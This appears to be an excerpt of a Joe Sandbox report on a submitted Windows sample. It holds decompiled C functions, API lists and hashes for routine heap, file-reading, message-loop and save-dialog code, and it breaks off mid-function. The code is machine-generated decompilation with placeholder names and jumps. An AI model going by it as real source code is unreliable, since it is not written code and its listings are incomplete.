                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: FileNameSave_memset
                                                  • String ID: X$output.prn$prn
                                                  • API String ID: 1534219092-3762636045
                                                  • Opcode ID: 0236a61d3e32a07435c3da76f6247a19fc48f4f561c5032feb24b510c98aa842
                                                  • Instruction ID: e2599603cedc2607cc0b31915f7e08254877d9d8b234ea696e0a881e293b064c
                                                  • Opcode Fuzzy Hash: 0236a61d3e32a07435c3da76f6247a19fc48f4f561c5032feb24b510c98aa842
                                                  • Instruction Fuzzy Hash: AFF08CB1C4024D9BCB00DFD4DC4A7CEBBB8AB08749F104009E944EA284EBB984588F80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010AF09F Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  C-Code - Quality: 95%
                                                  			E010AF09F(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				void* _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				void* _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					if(_t31 != 0) {
						_push(__ebx);
						while(_t31 <= 0xffffffe0) {
							if(_t31 == 0) {
								_t31 = _t31 + 1;
							}
							_t7 = HeapReAlloc( *0x10c27c4, 0, _a4, _t31);
							_t20 = _t7;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								if( *0x10c2d90 == _t7) {
									_t9 = E010A6117();
									 *_t9 = E010A6170(GetLastError());
									goto L17;
								} else {
									if(E010A8EE3(_t7, _t31) == 0) {
										_t12 = E010A6117();
										 *_t12 = E010A6170(GetLastError());
										L12:
										_t8 = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E010A8EE3(_t6, _t31);
						 *((intOrPtr*)(E010A6117())) = 0xc;
						goto L12;
					} else {
						E010A8C4B(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E010AF00D(__ebx, __edx, __edi, _a8);
				}
			}









                                                  0x010af0a6
                                                  0x010af0b4
                                                  0x010af0b9
                                                  0x010af0c8
                                                  0x010af0fb
                                                  0x010af0cd
                                                  0x010af0cf
                                                  0x010af0cf
                                                  0x010af0dc
                                                  0x010af0e2
                                                  0x010af0e6
                                                  0x010af146
                                                  0x010af146
                                                  0x010af0e8
                                                  0x010af0ee
                                                  0x010af130
                                                  0x010af144
                                                  0x00000000
                                                  0x010af0f0
                                                  0x010af0f9
                                                  0x010af118
                                                  0x010af12c
                                                  0x010af112
                                                  0x010af112
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x010af0f9
                                                  0x010af0ee
                                                  0x00000000
                                                  0x010af114
                                                  0x010af101
                                                  0x010af10c
                                                  0x00000000
                                                  0x010af0bb
                                                  0x010af0be
                                                  0x010af0c4
                                                  0x010af0c4
                                                  0x010af115
                                                  0x010af117
                                                  0x010af0a8
                                                  0x010af0b2
                                                  0x010af0b2

                                                  APIs
                                                  • _malloc.LIBCMT ref: 010AF0AB
                                                    • Part of subcall function 010AF00D: __FF_MSGBANNER.LIBCMT ref: 010AF024
                                                    • Part of subcall function 010AF00D: __NMSG_WRITE.LIBCMT ref: 010AF02B
                                                    • Part of subcall function 010AF00D: RtlAllocateHeap.NTDLL(00F00000,00000000,00000001,00000000,00000000,00000000,?,010A8CE3,00000000,00000000,00000000,00000000,?,010A891D,00000018,010BF1D8), ref: 010AF050
                                                  • _free.LIBCMT ref: 010AF0BE
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: AllocateHeap_free_malloc
                                                  • String ID:
                                                  • API String ID: 1020059152-0
                                                  • Opcode ID: ac49493d197588245193ce01024a556cc8cb8374df221078d845faddfa059ec6
                                                  • Instruction ID: 6acf8d7eeacd4ee94d2e70671bdddf4bf3011364256ec58441b7fbdb7462d314
                                                  • Opcode Fuzzy Hash: ac49493d197588245193ce01024a556cc8cb8374df221078d845faddfa059ec6
                                                  • Instruction Fuzzy Hash: F011C672500217AFDB723BF4EC44ADE3BE89F12265F94466AFAC49B141DF3698408B94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010A14B0 Relevance: 7.6, APIs: 5, Instructions: 50fileCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 72%
                                                  			E010A14B0(WCHAR* __ecx) {
				long _v8;
				void _v264;
				int _t5;
				int _t12;
				long _t16;
				void* _t19;

				_t5 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0x80, 0);
				_t19 = _t5;
				if(_t19 == 0xffffffff) {
					L4:
					return _t5 | 0xffffffff;
				} else {
					_t16 = GetFileSize(_t19, 0);
					if(_t16 != 0xffffffff) {
						_t10 =  <  ? _t16 : 0xff;
						_t12 = ReadFile(_t19,  &_v264,  <  ? _t16 : 0xff,  &_v8, 0);
						_push(_t19);
						if(_t12 == 0) {
							goto L3;
						} else {
							CloseHandle();
							return E010A10E0( &_v264, _v8);
						}
					} else {
						_push(_t19);
						L3:
						_t5 = CloseHandle();
						goto L4;
					}
				}
			}









                                                  0x010a14cd
                                                  0x010a14d3
                                                  0x010a14d8
                                                  0x010a14f1
                                                  0x010a14f8
                                                  0x010a14da
                                                  0x010a14e3
                                                  0x010a14e8
                                                  0x010a1506
                                                  0x010a1512
                                                  0x010a1518
                                                  0x010a151b
                                                  0x00000000
                                                  0x010a151d
                                                  0x010a151d
                                                  0x010a1535
                                                  0x010a1535
                                                  0x010a14ea
                                                  0x010a14ea
                                                  0x010a14eb
                                                  0x010a14eb
                                                  0x00000000
                                                  0x010a14eb
                                                  0x010a14e8

                                                  APIs
                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 010A14CD
                                                  • GetFileSize.KERNEL32(00000000,00000000,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 010A14DD
                                                  • CloseHandle.KERNEL32(00000000,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 010A14EB
                                                  • ReadFile.KERNEL32(00000000,?,000000FF,?,00000000,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 010A1512
                                                  • CloseHandle.KERNEL32(00000000,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 010A151D
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: File$CloseHandle$CreateReadSize
                                                  • String ID:
                                                  • API String ID: 3664964396-0
                                                  • Opcode ID: f2989496f8a3acf7acccd9178e719f196b0781fa1ed28da57f028bd16a63c671
                                                  • Instruction ID: 23415bc35618172805f93c12e6c2346075209b962ded3917a35aff052a2fb7aa
                                                  • Opcode Fuzzy Hash: f2989496f8a3acf7acccd9178e719f196b0781fa1ed28da57f028bd16a63c671
                                                  • Instruction Fuzzy Hash: B801DF302402146BFA30A6BC9D8AFE9366C9F06720F1003A5FAD6E21C0DAB5594147A5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010A9569 Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  C-Code - Quality: 92%
                                                  			E010A9569(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				LONG* _t20;
				signed int _t25;
				void* _t29;
				void* _t31;
				LONG* _t33;
				void* _t34;

				_t29 = __edx;
				_t24 = __ebx;
				_push(0xc);
				_push(0x10bf278);
				E010A61F0(__ebx, __edi, __esi);
				_t31 = E010A7A00();
				_t25 =  *0x10c1e64; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t25) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E010A8834(0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x10c16fc; // 0xf13230
					if(__eflags != 0) {
						__eflags = _t33;
						if(__eflags != 0) {
							__eflags = InterlockedDecrement(_t33);
							if(__eflags == 0) {
								__eflags = _t33 - 0x10c19f8;
								if(__eflags != 0) {
									E010A8C4B(_t33);
								}
							}
						}
						_t20 =  *0x10c16fc; // 0xf13230
						 *(_t31 + 0x68) = _t20;
						_t33 =  *0x10c16fc; // 0xf13230
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E010A9605();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				_t38 = _t33;
				if(_t33 == 0) {
					E010A44DD(_t24, _t29, _t31, _t33, _t38, 0x20);
				}
				return E010A6235(_t33);
			}









                                                  0x010a9569
                                                  0x010a9569
                                                  0x010a9569
                                                  0x010a956b
                                                  0x010a9570
                                                  0x010a957a
                                                  0x010a957c
                                                  0x010a9585
                                                  0x010a95a6
                                                  0x010a95ac
                                                  0x010a95b0
                                                  0x010a95b3
                                                  0x010a95b6
                                                  0x010a95bc
                                                  0x010a95be
                                                  0x010a95c0
                                                  0x010a95c9
                                                  0x010a95cb
                                                  0x010a95cd
                                                  0x010a95d3
                                                  0x010a95d6
                                                  0x010a95db
                                                  0x010a95d3
                                                  0x010a95cb
                                                  0x010a95dc
                                                  0x010a95e1
                                                  0x010a95e4
                                                  0x010a95ea
                                                  0x010a95ee
                                                  0x010a95ee
                                                  0x010a95f4
                                                  0x010a95fb
                                                  0x010a958d
                                                  0x010a958d
                                                  0x010a958d
                                                  0x010a9590
                                                  0x010a9592
                                                  0x010a9596
                                                  0x010a959b
                                                  0x010a95a3

                                                  APIs
                                                    • Part of subcall function 010A7A00: __getptd_noexit.LIBCMT ref: 010A7A01
                                                    • Part of subcall function 010A7A00: __amsg_exit.LIBCMT ref: 010A7A0E
                                                  • __amsg_exit.LIBCMT ref: 010A9596
                                                  • __lock.LIBCMT ref: 010A95A6
                                                  • InterlockedDecrement.KERNEL32(?), ref: 010A95C3
                                                  • _free.LIBCMT ref: 010A95D6
                                                  • InterlockedIncrement.KERNEL32(00F13230), ref: 010A95EE
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock_free
                                                  • String ID:
                                                  • API String ID: 1231874560-0
                                                  • Opcode ID: c11f683ff8823e5ff632bdef595faa801178fca77610af967a01849adf7ef81f
                                                  • Instruction ID: e865f658b2440249ad67686c148c2942c85d4372d33ca52f5e1e0c4e18141c01
                                                  • Opcode Fuzzy Hash: c11f683ff8823e5ff632bdef595faa801178fca77610af967a01849adf7ef81f
                                                  • Instruction Fuzzy Hash: 1A012631B00612DFEB21AFF8D0457DE7BA0AF05B58F884149D8C467641CB386942CFD0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010B6059 Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 90%
                                                  			E010B6059(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t24;
				void* _t35;
				intOrPtr* _t37;
				void* _t38;

				_push(0xc);
				_push(0x10bf540);
				E010A61F0(__ebx, __edi, __esi);
				_t35 = E010A7A00();
				_t37 = E010A8C83(8, 1);
				 *((intOrPtr*)(_t38 - 0x1c)) = _t37;
				if(_t37 != 0) {
					E010AEBF8(__ebx, __edx, _t35, _t37, __eflags);
					E010A9569(__ebx, __edx, _t35, _t37, __eflags);
					 *_t37 =  *((intOrPtr*)(_t35 + 0x6c));
					 *(_t37 + 4) =  *(_t35 + 0x68);
					E010A8834(0xc);
					_t5 = _t38 - 4;
					 *_t5 =  *(_t38 - 4) & 0x00000000;
					__eflags =  *_t5;
					E010AE973( *_t37);
					 *(_t38 - 4) = 0xfffffffe;
					E010B6713();
					E010A8834(0xd);
					 *(_t38 - 4) = 1;
					InterlockedIncrement( *(_t37 + 4));
					 *(_t38 - 4) = 0xfffffffe;
					E010B671F();
					_t24 = _t37;
				} else {
					 *((intOrPtr*)(E010A6117())) = 0xc;
					_t24 = 0;
				}
				return E010A6235(_t24);
			}







                                                  0x010b6679
                                                  0x010b667b
                                                  0x010b6680
                                                  0x010b668a
                                                  0x010b6697
                                                  0x010b6699
                                                  0x010b669e
                                                  0x010b66af
                                                  0x010b66b4
                                                  0x010b66bc
                                                  0x010b66c1
                                                  0x010b66c6
                                                  0x010b66cc
                                                  0x010b66cc
                                                  0x010b66cc
                                                  0x010b66d2
                                                  0x010b66d8
                                                  0x010b66df
                                                  0x010b66e6
                                                  0x010b66ec
                                                  0x010b66f6
                                                  0x010b66fc
                                                  0x010b6703
                                                  0x010b6708
                                                  0x010b66a0
                                                  0x010b66a5
                                                  0x010b66ab
                                                  0x010b66ab
                                                  0x010b670f

                                                  APIs
                                                    • Part of subcall function 010A7A00: __getptd_noexit.LIBCMT ref: 010A7A01
                                                    • Part of subcall function 010A7A00: __amsg_exit.LIBCMT ref: 010A7A0E
                                                  • __calloc_crt.LIBCMT ref: 010B6690
                                                    • Part of subcall function 010A8C83: __calloc_impl.LIBCMT ref: 010A8C92
                                                    • Part of subcall function 010A8C83: Sleep.KERNEL32(00000000), ref: 010A8CA9
                                                  • __lock.LIBCMT ref: 010B66C6
                                                  • ___addlocaleref.LIBCMT ref: 010B66D2
                                                  • __lock.LIBCMT ref: 010B66E6
                                                  • InterlockedIncrement.KERNEL32(?), ref: 010B66F6
                                                    • Part of subcall function 010A6117: __getptd_noexit.LIBCMT ref: 010A6117
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: __getptd_noexit__lock$IncrementInterlockedSleep___addlocaleref__amsg_exit__calloc_crt__calloc_impl
                                                  • String ID:
                                                  • API String ID: 2144732038-0
                                                  • Opcode ID: cbfd91b5a04e5eab36ba29cf4cab12f98568be2de02e716754b36da64eb53699
                                                  • Instruction ID: f1a1ca0ad01216167b7d32764e817ee420cfd6bd6a40dbb747c820eb2a2bd595
                                                  • Opcode Fuzzy Hash: cbfd91b5a04e5eab36ba29cf4cab12f98568be2de02e716754b36da64eb53699
                                                  • Instruction Fuzzy Hash: 23018471541702EAE720BFF4D841BDC77E0BF24B60F64821AE5D5AB2C0DF7699408B61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010A1420 Relevance: 7.5, APIs: 5, Instructions: 41windowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E010A1420() {
				intOrPtr _t6;
				int _t7;
				void* _t8;
				void* _t9;

				_t7 = GetWindowTextLengthW( *0x10c3f2c);
				if(SendMessageW( *0x10c3f2c, 0xb8, 0, 0) == 0) {
					L9:
					SetWindowTextW( *0x10c3f2c, 0x10bedac);
					SendMessageW( *0x10c3f2c, 0xcd, 0, 0);
					return SetFocus( *0x10c3f2c);
				}
				_t6 =  *0x10c43b0;
				if(_t7 == 0 && _t6 == 0) {
					goto L9;
				}
				_t8 = _t7 - 2;
				if(_t8 == 0) {
					L10:
					return _t6;
				} else {
					_t9 = _t8 - 4;
					if(_t9 == 0) {
						if(_t6 != 0) {
							goto L9;
						}
						_t6 = E010A1770();
						if(_t6 != 0) {
							goto L9;
						}
						goto L10;
					} else {
						if(_t9 == 1) {
							goto L9;
						}
						return _t6;
					}
				}
			}







                                                  0x010a143c
                                                  0x010a1446
                                                  0x010a1474
                                                  0x010a147f
                                                  0x010a1494
                                                  0x00000000
                                                  0x010a14a0
                                                  0x010a1448
                                                  0x010a1450
                                                  0x00000000
                                                  0x00000000
                                                  0x010a1457
                                                  0x010a145a
                                                  0x010a14a7
                                                  0x010a14a7
                                                  0x010a145c
                                                  0x010a145c
                                                  0x010a145f
                                                  0x010a1469
                                                  0x00000000
                                                  0x00000000
                                                  0x010a146b
                                                  0x010a1472
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x010a1461
                                                  0x010a1462
                                                  0x00000000
                                                  0x00000000
                                                  0x010a1465
                                                  0x010a1465
                                                  0x010a145f

                                                  APIs
                                                  • GetWindowTextLengthW.USER32(76F12D10), ref: 010A1427
                                                  • SendMessageW.USER32(000000B8,00000000,00000000), ref: 010A143E
                                                  • SetWindowTextW.USER32(010BEDAC), ref: 010A147F
                                                  • SendMessageW.USER32(000000CD,00000000,00000000), ref: 010A1494
                                                  • SetFocus.USER32(?,?,?,?,?,?,?), ref: 010A14A0
                                                    • Part of subcall function 010A1770: _memset.LIBCMT ref: 010A1781
                                                    • Part of subcall function 010A1770: lstrcpyW.KERNEL32 ref: 010A1795
                                                    • Part of subcall function 010A1770: GetSaveFileNameW.COMDLG32(?), ref: 010A17FD
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: MessageSendTextWindow$FileFocusLengthNameSave_memsetlstrcpy
                                                  • String ID:
                                                  • API String ID: 4018755269-0
                                                  • Opcode ID: ac784a792a3f1d9ed2c5502fb43ba3a710919bf6a91be5aa9e49e5d2a2e3390e
                                                  • Instruction ID: d0d01fd0f563563de540cd7f9346493ed34abdffebda81ad61e8cb312e8b1206
                                                  • Opcode Fuzzy Hash: ac784a792a3f1d9ed2c5502fb43ba3a710919bf6a91be5aa9e49e5d2a2e3390e
                                                  • Instruction Fuzzy Hash: 58F01D365402129BFEB22BFCBD49BE53E71BB05690F958151FAC4A90A9CF7B8901CB40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010A2AA8 Relevance: 7.5, APIs: 5, Instructions: 36windowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E010A2AA8(void* __ebp, struct HACCEL__* _a16, struct tagMSG _a20, intOrPtr _a28) {

				do {
					if(IsDialogMessageW( *0x10c3f28,  &_a20) == 0 && TranslateAcceleratorW( *0x10c3f24, _a16,  &_a20) == 0) {
						TranslateMessage( &_a20);
						DispatchMessageW( &_a20);
					}
				} while (GetMessageW( &_a20, 0, 0, 0) != 0);
				return _a28;
			}



                                                  0x010a2ab0
                                                  0x010a2ac3
                                                  0x010a2ae3
                                                  0x010a2aea
                                                  0x010a2aea
                                                  0x010a2af9
                                                  0x010a2b07

                                                  APIs
                                                  • IsDialogMessageW.USER32 ref: 010A2ABB
                                                  • TranslateAcceleratorW.USER32(?,?), ref: 010A2AD4
                                                  • TranslateMessage.USER32(?), ref: 010A2AE3
                                                  • DispatchMessageW.USER32 ref: 010A2AEA
                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 010A2AF7
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: Message$Translate$AcceleratorDialogDispatch
                                                  • String ID:
                                                  • API String ID: 3609149896-0
                                                  • Opcode ID: 133e86bec54473f1f56f6e4fd3e362fa2c5c49a2ea4619a0f178a58fcfc51ecf
                                                  • Instruction ID: 60769d02cf6f83864cc79469fbbcbb48fa8f249cc1afdab2abde353d41d93b44
                                                  • Opcode Fuzzy Hash: 133e86bec54473f1f56f6e4fd3e362fa2c5c49a2ea4619a0f178a58fcfc51ecf
                                                  • Instruction Fuzzy Hash: B7F0307220430AAFD720DF94ED84F9BB7ECFB88600F400829F6C4D2050E776D8199B62
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010A1890 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95memoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E010A1890(signed short* __ecx, intOrPtr __edx) {
				signed short* _v8;
				intOrPtr _v12;
				signed int _t25;
				signed short* _t31;
				short _t32;
				int _t34;
				signed short* _t35;
				signed int _t36;
				void* _t38;
				signed int _t39;
				signed int _t41;
				signed short* _t42;
				void* _t43;
				void* _t44;
				signed int _t45;
				signed short* _t46;
				void* _t47;

				_t35 = __ecx;
				_v12 = __edx;
				_t25 = 0;
				_t43 = 0;
				_t41 = 0;
				_v8 = __ecx;
				if( *__ecx == 0) {
					L12:
					_t44 = HeapAlloc(GetProcessHeap(), 0, 2 + _t25 * 2);
					if(_t44 == 0) {
						L26:
						return _t44;
					}
					_t42 = _v8;
					_t38 = 0;
					_t45 = 0;
					_t36 = 0;
					if( *_t42 == 0) {
						L25:
						 *(_t44 + _t45 * 2) = 0;
						goto L26;
					}
					_t31 = _t42;
					do {
						_t32 =  *_t31 & 0x0000ffff;
						if(_t38 == 0) {
							if(_t32 != 0x26) {
								 *(_t44 + _t45 * 2) = _t32;
								_t45 = _t45 + 1;
							} else {
								_t38 = _t32 - 0x25;
							}
						} else {
							if(_t32 != 0x26) {
								if(_t32 == 0x70) {
									_t34 = wnsprintfW(_t44 + _t45 * 2, 0xb, L"%d", _v12);
									_t42 = _v8;
									_t47 = _t47 + 0x10;
									_t45 = _t45 + _t34;
								}
								_t38 = 0;
							} else {
								 *(_t44 + _t45 * 2) = _t32;
								_t45 = _t45 + 1;
								_t38 = 0;
							}
						}
						_t36 = _t36 + 1;
						_t31 =  &(_t42[_t36]);
					} while (_t42[_t36] != 0);
					goto L25;
				} else {
					_t46 = __ecx;
					do {
						if(_t43 == 0) {
							if( *_t46 != 0x26) {
								_t25 = _t25 + 1;
							} else {
								_t43 = 1;
							}
						} else {
							_t39 =  *_t46 & 0x0000ffff;
							if(_t39 != 0x26) {
								if(_t39 == 0x70) {
									_t25 = _t25 + 0xb;
								}
								_t43 = 0;
							} else {
								_t25 = _t25 + 1;
								_t43 = 0;
							}
						}
						_t41 = _t41 + 1;
						_t46 = _t35 + _t41 * 2;
					} while ( *(_t35 + _t41 * 2) != 0);
					goto L12;
				}
			}




















                                                  0x010a1898
                                                  0x010a189b
                                                  0x010a189e
                                                  0x010a18a0
                                                  0x010a18a2
                                                  0x010a18a4
                                                  0x010a18aa
                                                  0x010a18e6
                                                  0x010a18fd
                                                  0x010a1901
                                                  0x010a196d
                                                  0x010a1975
                                                  0x010a1975
                                                  0x010a1903
                                                  0x010a1906
                                                  0x010a1908
                                                  0x010a190a
                                                  0x010a190f
                                                  0x010a1967
                                                  0x010a1969
                                                  0x00000000
                                                  0x010a1969
                                                  0x010a1911
                                                  0x010a1913
                                                  0x010a1913
                                                  0x010a1918
                                                  0x010a1950
                                                  0x010a1957
                                                  0x010a195b
                                                  0x010a1952
                                                  0x010a1952
                                                  0x010a1952
                                                  0x010a191a
                                                  0x010a191d
                                                  0x010a192b
                                                  0x010a193b
                                                  0x010a1941
                                                  0x010a1944
                                                  0x010a1947
                                                  0x010a1947
                                                  0x010a1949
                                                  0x010a191f
                                                  0x010a191f
                                                  0x010a1923
                                                  0x010a1924
                                                  0x010a1924
                                                  0x010a191d
                                                  0x010a195c
                                                  0x010a1962
                                                  0x010a1962
                                                  0x00000000
                                                  0x010a18ac
                                                  0x010a18ac
                                                  0x010a18b0
                                                  0x010a18b2
                                                  0x010a18d1
                                                  0x010a18da
                                                  0x010a18d3
                                                  0x010a18d3
                                                  0x010a18d3
                                                  0x010a18b4
                                                  0x010a18b4
                                                  0x010a18ba
                                                  0x010a18c4
                                                  0x010a18c6
                                                  0x010a18c6
                                                  0x010a18c9
                                                  0x010a18bc
                                                  0x010a18bc
                                                  0x010a18bd
                                                  0x010a18bd
                                                  0x010a18ba
                                                  0x010a18db
                                                  0x010a18e1
                                                  0x010a18e1
                                                  0x00000000
                                                  0x010a18b0

                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 010A18F0
                                                  • HeapAlloc.KERNEL32(00000000), ref: 010A18F7
                                                  • wnsprintfW.SHLWAPI ref: 010A193B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcesswnsprintf
                                                  • String ID: 0U%w
                                                  • API String ID: 3886780628-2643132318
                                                  • Opcode ID: 9916096c3805b4b9809225e567bc4ec116c3a758825a474b788992e65f558275
                                                  • Instruction ID: 6a90e6872953abbebb6a89e2ed5d5b7f0aecbfb60ae0a0b9def7b31458370648
                                                  • Opcode Fuzzy Hash: 9916096c3805b4b9809225e567bc4ec116c3a758825a474b788992e65f558275
                                                  • Instruction Fuzzy Hash: DE21043A900215ABEF658FE9C48067D73FAFB85310FA440AAD8C6D7141EB708991C3E0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010A2000 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E010A2000() {
				intOrPtr _v38;
				short _v40;
				intOrPtr _v52;
				intOrPtr _v60;
